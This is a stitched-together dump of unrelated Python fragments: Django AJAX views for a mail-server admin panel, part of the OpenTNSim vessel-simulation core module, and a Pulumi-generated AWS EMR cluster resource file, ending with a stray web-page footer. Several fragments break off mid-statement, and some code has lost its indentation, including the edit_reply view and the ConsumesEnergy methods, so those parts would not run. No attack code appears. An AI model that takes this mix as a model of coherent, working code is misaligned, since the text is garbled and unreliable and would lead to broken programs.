        saveWhitelist()
    return HttpResponse(json.dumps(data), content_type="application/json")
@licence_required
def ajax_edit_account(request):
    """AJAX dispatcher for per-mailbox edits.

    POST['action'] selects the operation: group membership
    (add_group/del_group), department membership
    (add_dept/del_dept/edit_dept), mailing-list membership
    (add_maillist/del_maillist), related emails
    (add_relate_email/del_relate_email), or 'edit' for a full form-backed
    update of the mailbox itself. Returns a JSON response with 'msg' and,
    for most actions, 'result' plus the created/affected object's fields.

    Raises Http404 when no mailbox_id is supplied.
    """
    domain_id = get_domainid_bysession(request)
    data = request.POST
    # NOTE(review): "id" shadows the builtin; it is the id of the
    # membership row being acted on (not the mailbox id).
    id = data.get('id', '')
    mailbox_id = data.get('mailbox_id', '')
    action = data.get('action', '').strip()
    group_id = data.get('group_id', '').strip()
    if not mailbox_id:
        raise Http404
    if action == 'del_group':
        CoreGroupMember.objects.filter(id=id, mailbox_id=mailbox_id).delete()
        res = {'msg': _(u'删除成功').encode('utf-8')}
    elif action == 'add_group':
        # A mailbox may belong to at most one group.
        if CoreGroupMember.objects.filter(mailbox_id=mailbox_id):
            msg = _(u'邮箱已存在于其他组')
            res = {'msg': msg.encode('utf-8'),
                'result': False, 'group_id': 0, 'group_name': ''}
        else:
            obj, _b = CoreGroupMember.objects.get_or_create(group_id=group_id, mailbox_id=mailbox_id)
            msg = _(u'添加成功') if _b else _(u'重复添加')
            res = {'msg': msg.encode('utf-8'),
                'result': _b, 'group_id': obj.id, 'group_name': obj.group.name}
    elif action == 'del_dept':
        DepartmentMember.objects.filter(id=id, mailbox_id=mailbox_id).delete()
        res = {'msg': _(u'删除成功').encode('utf-8')}
    elif action == 'add_dept':
        dept_id = data.get('dept_id', '').strip()
        postion = data.get('position', '').strip()
        obj, _b = DepartmentMember.objects.get_or_create(domain_id=domain_id, dept_id=dept_id, mailbox_id=mailbox_id)
        # Only set the position when the membership was newly created.
        if _b:
            msg = _(u'添加成功')
            obj.position = postion
            obj.save()
        else:
            msg = _(u'重复添加')
        res = {'msg': msg.encode('utf-8'),
            'result': _b, 'dept_id': obj.id, 'dept_name': obj.dept.title, 'position': obj.position}
    elif action == 'edit_dept':
        postion = data.get('position', '').strip()
        obj = DepartmentMember.objects.filter(id=id, mailbox_id=mailbox_id).first()
        if obj:
            obj.position = postion
            obj.save()
        res = {'msg': _(u'修改成功').encode('utf-8')}
    elif action == 'del_maillist':
        ExtListMember.objects.filter(id=id, address=Mailbox.objects.get(id=mailbox_id).username).delete()
        res = {'msg': _(u'删除成功').encode('utf-8')}
    elif action == 'add_maillist':
        maillist_id = data.get('maillist_id', '')
        permit = data.get('permit', '')
        mailbox_obj = Mailbox.objects.get(id=mailbox_id)
        objs = ExtListMember.objects.filter(domain_id=domain_id, extlist_id=maillist_id, address=mailbox_obj.username)
        if objs:
            obj = objs[0]
            _b = False
            msg = _(u'重复添加')
        else:
            _b = True
            obj = ExtListMember.objects.create(domain_id=domain_id, extlist_id=maillist_id,
                                               address=mailbox_obj.username,
                                               name=mailbox_obj.mailboxuser.realname, permit=permit, update_time=time.time())
            msg = _(u'添加成功')
        res = {'msg': msg.encode('utf-8'),
            'result': _b, 'maillist_id': obj.id, 'maillist_name': obj.extlist.listname,
            'maillist_address': obj.extlist.address}
    elif action == 'del_relate_email':
        WmRelateEmail.objects.filter(id=id, mailbox_id=mailbox_id).delete()
        res = {'msg': _(u'删除成功').encode('utf-8')}
    elif action == 'add_relate_email':
        relate_name = data.get('relate_name', '')
        relate_domain = data.get('relate_domain', '')
        target_objs = Mailbox.objects.filter(domain_id=relate_domain, name=relate_name)
        if target_objs:
            target_obj = target_objs[0]
            obj, _b = WmRelateEmail.objects.get_or_create(mailbox_id=mailbox_id, target=target_obj, domain_id=domain_id)
            if _b:
                msg = _(u'添加成功')
            else:
                msg = _(u'重复添加')
            res = {'msg': msg.encode('utf-8'),
                'result': _b, 'relate_id': obj.id, 'relate_name': obj.target.username,
                'relate_domain': obj.domain.domain, 'access': obj.get_access_display()}
        else:
            msg = _(u'邮箱不存在')
            res = {'msg': msg.encode('utf-8')}
    elif action == 'edit':
        # Full mailbox edit: normalize checkbox values, validate both forms
        # and enforce domain quota limits before saving.
        data = data.copy()
        domain_id = get_domainid_bysession(request)
        domain = Domain.objects.get(id=domain_id)
        obj = Mailbox.objects.get(id=mailbox_id)
        disabled_origin = obj.disabled
        user = obj.mailboxuser
        # HTML checkboxes post 'on' when checked; map to the stored flags.
        disabled = data.get('disabled', '')
        data['disabled'] = '-1' if disabled == 'on' else '1'
        change_pwd = data.get('change_pwd', '')
        data['change_pwd'] = '1' if change_pwd == 'on' else '-1'
        enable_share = data.get('enable_share', '')
        data['enable_share'] = 1 if enable_share == 'on' else -1
        oabshow = data.get('oabshow', '')
        data['oabshow'] = '1' if oabshow == 'on' else '-1'
        mailbox_size_using = obj.quota_mailbox
        netdisk_size_using = obj.quota_netdisk
        form = MailboxForm(domain, data, instance=obj)
        user_form = MailboxUserForm(domain, data, instance=user)
        result = True
        if form.is_valid() and user_form.is_valid():
            checker = MailboxLimitChecker()
            mailbox_size = form.cleaned_data.get('quota_mailbox')
            netdisk_size = form.cleaned_data.get('quota_netdisk')
            # Re-enabling a disabled mailbox counts against the licence.
            if form.cleaned_data['disabled'] == '-1' and disabled_origin == '1':
                check_count = 1
            else:
                check_count = 0
            try:
                checker.simple_check(domain_id, mailbox_size, netdisk_size, mailbox_size_using, netdisk_size_using, check_count)
            except Exception, e:
                msg = u'{}{}'.format(_(u'修改失败。'), e.message)
                result = False
            else:
                obj = form.save()
                user_form.save(obj.id)
                msg = _(u'邮箱(%s)修改成功') % obj.username
        else:
            result = False
            msg = u'{} {}'.format(form.errors, user_form.errors)
        res = {'msg': msg.encode('utf-8'), 'result': result}
        # Propagate the change to peer nodes in distributed deployments.
        if is_distribute_open():
            task_queue = TaskQueue()
            proxy_data = {
                'protocol': 'core_mailbox',
                'data': {'update': mailbox_id}
            }
            task_queue.add_task_to_queue('proxy_web_command', proxy_data)
            task_queue.create_trigger('proxy')
    return HttpResponse(json.dumps(res), content_type="application/json")
@licence_required
def reply(request, id, template_name='mailbox/reply.html'):
    """Render the auto-reply overview page for one mailbox."""
    mailbox = Mailbox.objects.get(id=id)
    context = {
        'mailbox_id': mailbox.id,
        'mailbox_obj': mailbox,
        'lists': ExtReply.objects.filter(mailbox=mailbox),
        'day_dict': DAY_DICT,
    }
    return render(request, template_name=template_name, context=context)
@licence_required
def add_reply(request, id, template_name='mailbox/add_reply.html'):
    """Render the add-auto-reply form for one mailbox."""
    mailbox = Mailbox.objects.get(id=id)
    return render(
        request,
        template_name=template_name,
        context={'mailbox_obj': mailbox, 'mailbox_id': mailbox.id},
    )
@licence_required
def edit_reply(request, id, template_name='mailbox/edit_reply.html'):
obj = ExtReply.objects.get(id=id)
mailbox_obj = obj.mailbox
rule_obj = obj.rule
conditions = rule_obj.rule_condition.all()
con_lists = ['sender', 'sender_original', 'recipient', 'recipient_original', 'copy_addr', 'subject']
con = []
for f in con_lists:
_con = {'option': f, 'name': | |
# opentnsim/core.py
"""Main module."""
# package(s) related to time, space and id
import json
import logging
import uuid
# you need these dependencies (you can get these from anaconda)
# package(s) related to the simulation
import simpy
import random
import networkx as nx
import numpy as np
import math
import pandas as pd
# spatial libraries
import pyproj
import shapely.geometry
# additional packages
import datetime, time
logger = logging.getLogger(__name__)
class SimpyObject:
    """Base mixin for anything that needs access to a simpy environment.

    env: the simpy Environment the object lives in
    """

    def __init__(self, env, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.env = env
class HasResource(SimpyObject):
    """Mixin for objects whose use requires acquiring a resource first.

    nr_resources: number of requests that can be handled simultaneously
    priority: when True, use a simpy.PriorityResource instead of a
        plain simpy.Resource
    """

    def __init__(self, nr_resources=1, priority=False, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if priority:
            self.resource = simpy.PriorityResource(self.env, capacity=nr_resources)
        else:
            self.resource = simpy.Resource(self.env, capacity=nr_resources)
class Identifiable:
    """Mixin giving an object a human-readable name and a unique id.

    name: a name
    id: unique identifier; a uuid1-based string is generated when omitted
    """

    def __init__(self, name, id=None, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.name = name
        # Fall back to a generated uuid when no (truthy) id was supplied.
        self.id = id or str(uuid.uuid1())
class Locatable:
    """Mixin for objects carrying a geometry (geojson style).

    geometry: point or polygon describing the object's location;
        the associated graph node starts out unset (None)
    """

    def __init__(self, geometry, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.geometry = geometry
        self.node = None
class Neighbours:
    """Can be added to a locatable object (list)

    travel_to: list of locatables to which can be travelled
    """

    def __init__(self, travel_to, *args, **kwargs):
        # BUG FIX: the constructor was misspelled ``___init`` (neither
        # ``__init__`` nor a valid dunder), so it was never invoked and
        # ``neighbours`` was never set.
        super().__init__(*args, **kwargs)
        self.neighbours = travel_to
class HasLength(SimpyObject):
    """Mixin class: Something with a claimable length

    length: total length available
    remaining_length: length initially occupied (initial container level)
    total_requested: accepted for signature compatibility —
        NOTE(review): this parameter is never stored or used here; the
        previous docstring was copied from HasContainer and did not match
        these parameters. Confirm against callers before removing.
    """
    def __init__(self, length, remaining_length=0, total_requested=0, *args, **kwargs):
        super().__init__(*args, **kwargs)
        """Initialization"""
        # Two containers with identical capacity and initial level;
        # presumably they track opposite ends / directions — TODO confirm.
        self.length = simpy.Container(self.env, capacity = length, init=remaining_length)
        self.pos_length = simpy.Container(self.env, capacity = length, init=remaining_length)
class HasContainer(SimpyObject):
    """Mixin class: Something with a storage capacity

    capacity: amount the container can hold
    level: amount the container holds initially
    container: a simpy.Container that holds the cargo
    total_requested: a counter that helps to prevent over requesting
    """

    def __init__(self, capacity, level=0, total_requested=0, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.container = simpy.Container(self.env, capacity, init=level)
        self.total_requested = total_requested

    @property
    def is_loaded(self):
        """True when the container holds anything at all."""
        # Idiom fix: return the boolean expression directly instead of
        # ``True if ... else False``.
        return self.container.level > 0

    @property
    def filling_degree(self):
        """Fraction of the capacity currently in use (0.0 - 1.0)."""
        return self.container.level / self.container.capacity
class Log(SimpyObject):
    """Mixin class: Something that has logging capability

    log: dict of four parallel lists:
        Message: log message (format: 'start activity' / 'stop activity')
        Timestamp: datetime converted from the POSIX timestamp ``t``
        Value: an arbitrary value logged alongside the message
        Geometry: value from a locatable (lat, lon)
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.log = {"Message": [], "Timestamp": [], "Value": [], "Geometry": []}

    def log_entry(self, log, t, value, geometry_log):
        """Append one entry; ``t`` is a POSIX timestamp in seconds."""
        self.log["Message"].append(log)
        self.log["Timestamp"].append(datetime.datetime.fromtimestamp(t))
        self.log["Value"].append(value)
        self.log["Geometry"].append(geometry_log)

    def get_log_as_json(self):
        """Return the log as a list of dicts, one per entry.

        The local accumulator is named ``entries`` — it previously shadowed
        the module-level ``json`` import.
        """
        entries = []
        for msg, t, value, geometry_log in zip(
            self.log["Message"],
            self.log["Timestamp"],
            self.log["Value"],
            self.log["Geometry"],
        ):
            entries.append(
                dict(message=msg, time=t, value=value, geometry_log=geometry_log)
            )
        return entries
class VesselProperties:
    """Mixin class: Something that has vessel properties

    This mixin is updated to better accommodate the ConsumesEnergy mixin

    type: can contain info on vessel type (avv class, cemt_class or other)
    B: vessel width
    L: vessel length
    H_e: vessel height unloaded
    H_f: vessel height loaded
    T_e: draught unloaded
    T_f: draught loaded

    Add information on possible restrictions to the vessels, i.e. height, width, etc.
    """

    def __init__(self, type, B, L, H_e, H_f, T_e, T_f, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.type = type
        self.B = B
        self.L = L
        self.H_e = H_e
        # BUG FIX: H_f was previously assigned from H_e, making loaded and
        # unloaded heights identical (the H property became constant).
        self.H_f = H_f
        self.T_e = T_e
        self.T_f = T_f

    @property
    def H(self):
        """Current height, interpolated between unloaded/loaded heights
        by the filling degree (provided by the HasContainer mixin)."""
        return self.filling_degree * (self.H_f - self.H_e) + self.H_e

    @property
    def T(self):
        """Current draught, interpolated by filling degree.

        Here we should implement the rules from Van Dorsser et al:
        https://www.researchgate.net/publication/344340126_The_effect_of_low_water_on_loading_capacity_of_inland_ships
        """
        return self.filling_degree * (self.T_f - self.T_e) + self.T_e

    def get_route(
        self,
        origin,
        destination,
        graph=None,
        minWidth=None,
        minHeight=None,
        minDepth=None,
        randomSeed=4,
    ):
        """Calculate a path between two nodes honouring vessel restrictions.

        Falls back to 1.1x the vessel's own dimensions when no explicit
        minima are given. Raises ValueError when no feasible path exists.
        """
        graph = graph if graph else self.env.FG
        minWidth = minWidth if minWidth else 1.1 * self.B
        # BUG FIX: minHeight and minDepth previously fell back to minWidth,
        # so vessel height/draught were never used for the defaults.
        minHeight = minHeight if minHeight else 1.1 * self.H
        minDepth = minDepth if minDepth else 1.1 * self.T
        # Check if information on restrictions is added to the edges
        # (sampled from one random edge).
        random.seed(randomSeed)
        edge = random.choice(list(graph.edges(data=True)))
        edge_attrs = list(edge[2].keys())
        # IMPROVE THIS TO CHECK ALL EDGES AND COMBINATIONS OF RESTRICTIONS
        if all(item in edge_attrs for item in ["Width", "Height", "Depth"]):
            # Build a subgraph of only the edges the vessel fits through.
            edges = []
            nodes = []
            for edge in graph.edges(data=True):
                if (
                    edge[2]["Width"] >= minWidth
                    and edge[2]["Height"] >= minHeight
                    and edge[2]["Depth"] >= minDepth
                ):
                    edges.append(edge)
                    nodes.append(graph.nodes[edge[0]])
                    nodes.append(graph.nodes[edge[1]])
            subGraph = graph.__class__()
            for node in nodes:
                subGraph.add_node(
                    node["name"],
                    name=node["name"],
                    geometry=node["geometry"],
                    position=(node["geometry"].x, node["geometry"].y),
                )
            for edge in edges:
                subGraph.add_edge(edge[0], edge[1], attr_dict=edge[2])
            try:
                return nx.dijkstra_path(subGraph, origin, destination)
                # return nx.bidirectional_dijkstra(subGraph, origin, destination)
            except nx.NetworkXException as exc:
                # Narrowed from a bare ``except:`` so unrelated errors
                # (KeyboardInterrupt, typos) are no longer swallowed.
                raise ValueError(
                    "No path was found with the given boundary conditions."
                ) from exc
        # If not, return shortest path
        else:
            return nx.dijkstra_path(graph, origin, destination)
class ConsumesEnergy:
"""Mixin class: Something that consumes energy.
P_installed: installed engine power [kW]
L_w: weight class of the ship (depending on carrying capacity) (classes: L1 (=1), L2 (=2), L3 (=3))
C_b: block coefficient ('fullness') [-]
nu: kinematic viscosity [m^2/s]
rho: density of the surrounding water [kg/m^3]
g: gravitational accelleration [m/s^2]
x: number of propellors [-]
eta_0: open water efficiency of propellor [-]
eta_r: relative rotative efficiency [-]
eta_t: transmission efficiency [-]
eta_g: gearing efficiency [-]
c_stern: determines shape of the afterbody [-]
one_k2: appendage resistance factor [-]
c_year: construction year of the engine [y]
"""
    def __init__(
        self,
        P_installed,
        L_w,
        C_b,
        nu=1 * 10 ** (-6),  # kinematic viscosity
        rho=1000,
        g=9.81,
        x=2,  # number of propellors
        eta_0=0.6,
        eta_r=1.00,
        eta_t=0.98,
        eta_g=0.96,
        c_stern=0,
        one_k2=2.5,
        *args,
        **kwargs
    ):
        """Store the energy-consumption parameters and draw an engine age.

        P_installed: installed engine power [kW]
        L_w: weight class of the ship (1, 2 or 3)
        C_b: block coefficient ('fullness') [-]
        nu: kinematic viscosity [m^2/s]
        rho: density of the surrounding water [kg/m^3]
        g: gravitational acceleration [m/s^2]
        x: number of propellors [-]
        eta_0/eta_r/eta_t/eta_g: propulsion-chain efficiencies [-]
        c_stern: determines shape of the afterbody [-]
        one_k2: appendage resistance factor [-]
        """
        super().__init__(*args, **kwargs)
        self.P_installed = P_installed
        self.L_w = L_w
        self.C_b = C_b
        self.nu = nu
        self.rho = rho
        self.g = g
        self.x = x
        self.eta_0 = eta_0
        self.eta_r = eta_r
        self.eta_t = eta_t
        self.eta_g = eta_g
        self.c_stern = c_stern
        self.one_k2 = one_k2
        self.c_year = self.calculate_engine_age()  # The construction year of the engine is now generated once, instead of for each time step
# The engine age and construction year of the engine is computed with the function below.
# The construction year of the engine is used in the emission functions (1) emission_factors_general and (2) correction_factors
def calculate_engine_age(self):
"""Calculating the construction year of the engine, dependend on a Weibull function with
shape factor 'k', and scale factor 'lmb', which are determined by the weight class L_w"""
# Determining which shape and scale factor to use, based on the weight class L_w = L1, L2 or L3
if self.L_w == 1: # Weight class L1
self.k = 1.3
self.lmb = 20.5
if self.L_w == 2: # Weight class L2
self.k = 1.12
self.lmb = 18.5
if self.L_w == 3: # Weight class L3
self.k = 1.26
self.lmb = 18.6
# The age of the engine
self.age = int(np.random.weibull(self.k) * self.lmb)
# Current year (TO DO: fix hardcoded year)
# self.year = datetime.date.year
self.year = 2021
# Construction year of the engine
self.c_year = self.year - self.age
print('The construction year of the engine is', self.c_year)
return self.c_year
def calculate_properties(self):
"""Calculate a number of basic vessel properties"""
self.C_M = 1.006 - 0.0056 * self.C_b ** (-3.56) # Midship section coefficient
self.C_wp = (1 + 2 * self.C_b) / 3 # Waterplane coefficient
self.C_p = self.C_b / self.C_M # Prismatic coefficient
self.delta = self.C_b * self.L * self.B * self.T # Water displacement
self.lcb = -13.5 + 19.4 * self.C_p # longitudinal center of buoyancy
self.L_R = self.L * (1 - self.C_p + (0.06 * self.C_p * self.lcb) / (
4 * self.C_p - 1)) # parameter reflecting the length of the run
self.A_T = 0.2 * self.B * self.T # transverse area of the transom
# Total wet area
self.S_T = self.L * (2 * self.T + self.B) * np.sqrt(self.C_M) * (
0.453 + 0.4425 * self.C_b - 0.2862 * self.C_M - 0.003467 * (
self.B / self.T) + | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Cluster(pulumi.CustomResource):
additional_info: pulumi.Output[str]
"""
A JSON string for selecting additional features such as adding proxy information. Note: Currently there is no API to retrieve the value of this argument after EMR cluster creation from provider, therefore this provider cannot detect drift from the actual EMR cluster if its value is changed outside this provider.
"""
applications: pulumi.Output[list]
"""
A list of applications for the cluster. Valid values are: `Flink`, `Hadoop`, `Hive`, `Mahout`, `Pig`, `Spark`, and `JupyterHub` (as of EMR 5.14.0). Case insensitive
"""
arn: pulumi.Output[str]
autoscaling_role: pulumi.Output[str]
"""
An IAM role for automatic scaling policies. The IAM role provides permissions that the automatic scaling feature requires to launch and terminate EC2 instances in an instance group.
"""
bootstrap_actions: pulumi.Output[list]
"""
Ordered list of bootstrap actions that will be run before Hadoop is started on the cluster nodes. Defined below.
* `args` (`list`) - List of command line arguments passed to the JAR file's main function when executed.
* `name` (`str`) - The name of the step.
* `path` (`str`) - Location of the script to run during a bootstrap action. Can be either a location in Amazon S3 or on a local file system
"""
cluster_state: pulumi.Output[str]
configurations: pulumi.Output[str]
"""
List of configurations supplied for the EMR cluster you are creating
"""
configurations_json: pulumi.Output[str]
"""
A JSON string for supplying list of configurations for the EMR cluster.
"""
core_instance_count: pulumi.Output[float]
"""
Use the `core_instance_group` configuration block `instance_count` argument instead. Number of Amazon EC2 instances used to execute the job flow. EMR will use one node as the cluster's master node and use the remainder of the nodes (`core_instance_count`-1) as core nodes. Cannot be specified if `core_instance_group` or `instance_group` configuration blocks are set. Default `1`
"""
core_instance_group: pulumi.Output[dict]
"""
Configuration block to use an [Instance Group](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-instance-group-configuration.html#emr-plan-instance-groups) for the [core node type](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-master-core-task-nodes.html#emr-plan-core). Cannot be specified if `core_instance_count` argument, `core_instance_type` argument, or `instance_group` configuration blocks are set. Detailed below.
* `autoscaling_policy` (`str`) - The autoscaling policy document. This is a JSON formatted string. See [EMR Auto Scaling](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-automatic-scaling.html)
* `bid_price` (`str`) - Bid price for each EC2 instance in the instance group, expressed in USD. By setting this attribute, the instance group is being declared as a Spot Instance, and will implicitly create a Spot request. Leave this blank to use On-Demand Instances.
* `ebs_configs` (`list`) - Configuration block(s) for EBS volumes attached to each instance in the instance group. Detailed below.
* `iops` (`float`) - The number of I/O operations per second (IOPS) that the volume supports
* `size` (`float`) - The volume size, in gibibytes (GiB).
* `type` (`str`) - The volume type. Valid options are `gp2`, `io1`, `standard` and `st1`. See [EBS Volume Types](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html).
* `volumesPerInstance` (`float`) - The number of EBS volumes with this configuration to attach to each EC2 instance in the instance group (default is 1)
* `id` (`str`) - The ID of the EMR Cluster
* `instance_count` (`float`) - Target number of instances for the instance group. Must be 1 or 3. Defaults to 1. Launching with multiple master nodes is only supported in EMR version 5.23.0+, and requires this resource's `core_instance_group` to be configured. Public (Internet accessible) instances must be created in VPC subnets that have `map public IP on launch` enabled. Termination protection is automatically enabled when launched with multiple master nodes and this provider must have the `termination_protection = false` configuration applied before destroying this resource.
* `instance_type` (`str`) - EC2 instance type for all instances in the instance group.
* `name` (`str`) - The name of the step.
"""
core_instance_type: pulumi.Output[str]
"""
Use the `core_instance_group` configuration block `instance_type` argument instead. The EC2 instance type of the slave nodes. Cannot be specified if `core_instance_group` or `instance_group` configuration blocks are set.
"""
custom_ami_id: pulumi.Output[str]
"""
A custom Amazon Linux AMI for the cluster (instead of an EMR-owned AMI). Available in Amazon EMR version 5.7.0 and later.
"""
ebs_root_volume_size: pulumi.Output[float]
"""
Size in GiB of the EBS root device volume of the Linux AMI that is used for each EC2 instance. Available in Amazon EMR version 4.x and later.
"""
ec2_attributes: pulumi.Output[dict]
"""
Attributes for the EC2 instances running the job flow. Defined below
* `additionalMasterSecurityGroups` (`str`) - String containing a comma separated list of additional Amazon EC2 security group IDs for the master node
* `additionalSlaveSecurityGroups` (`str`) - String containing a comma separated list of additional Amazon EC2 security group IDs for the slave nodes as a comma separated string
* `emrManagedMasterSecurityGroup` (`str`) - Identifier of the Amazon EC2 EMR-Managed security group for the master node
* `emrManagedSlaveSecurityGroup` (`str`) - Identifier of the Amazon EC2 EMR-Managed security group for the slave nodes
* `instanceProfile` (`str`) - Instance Profile for EC2 instances of the cluster assume this role
* `key_name` (`str`) - Amazon EC2 key pair that can be used to ssh to the master node as the user called `<PASSWORD>`
* `serviceAccessSecurityGroup` (`str`) - Identifier of the Amazon EC2 service-access security group - required when the cluster runs on a private subnet
* `subnet_id` (`str`) - VPC subnet id where you want the job flow to launch. Cannot specify the `cc1.4xlarge` instance type for nodes of a job flow launched in a Amazon VPC
"""
instance_groups: pulumi.Output[list]
"""
Use the `master_instance_group` configuration block, `core_instance_group` configuration block and `emr.InstanceGroup` resource(s) instead. A list of `instance_group` objects for each instance group in the cluster. Exactly one of `master_instance_type` and `instance_group` must be specified. If `instance_group` is set, then it must contain a configuration block for at least the `MASTER` instance group type (as well as any additional instance groups). Cannot be specified if `master_instance_group` or `core_instance_group` configuration blocks are set. Defined below
* `autoscaling_policy` (`str`) - The autoscaling policy document. This is a JSON formatted string. See [EMR Auto Scaling](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-automatic-scaling.html)
* `bid_price` (`str`) - Bid price for each EC2 instance in the instance group, expressed in USD. By setting this attribute, the instance group is being declared as a Spot Instance, and will implicitly create a Spot request. Leave this blank to use On-Demand Instances.
* `ebs_configs` (`list`) - Configuration block(s) for EBS volumes attached to each instance in the instance group. Detailed below.
* `iops` (`float`) - The number of I/O operations per second (IOPS) that the volume supports
* `size` (`float`) - The volume size, in gibibytes (GiB).
* `type` (`str`) - The volume type. Valid options are `gp2`, `io1`, `standard` and `st1`. See [EBS Volume Types](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html).
* `volumesPerInstance` (`float`) - The number of EBS volumes with this configuration to attach to each EC2 instance in the instance group (default is 1)
* `id` (`str`) - The ID of the EMR Cluster
* `instance_count` (`float`) - Target number of instances for the instance group. Must be 1 or 3. Defaults to 1. Launching with multiple master nodes is only supported in EMR version 5.23.0+, and requires this resource's `core_instance_group` to be configured. Public (Internet accessible) instances must be created in VPC subnets that have `map public IP on launch` enabled. Termination protection is automatically enabled when launched with multiple master nodes and this provider must have the `termination_protection = false` configuration applied before destroying this resource.
* `instanceRole` (`str`) - The role of the instance group in the cluster. Valid values are: `MASTER`, `CORE`, and `TASK`.
* `instance_type` (`str`) - EC2 instance type for all instances in the instance group.
* `name` (`str`) - The name of the step.
"""
keep_job_flow_alive_when_no_steps: pulumi.Output[bool]
"""
Switch on/off run cluster with no steps or when |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.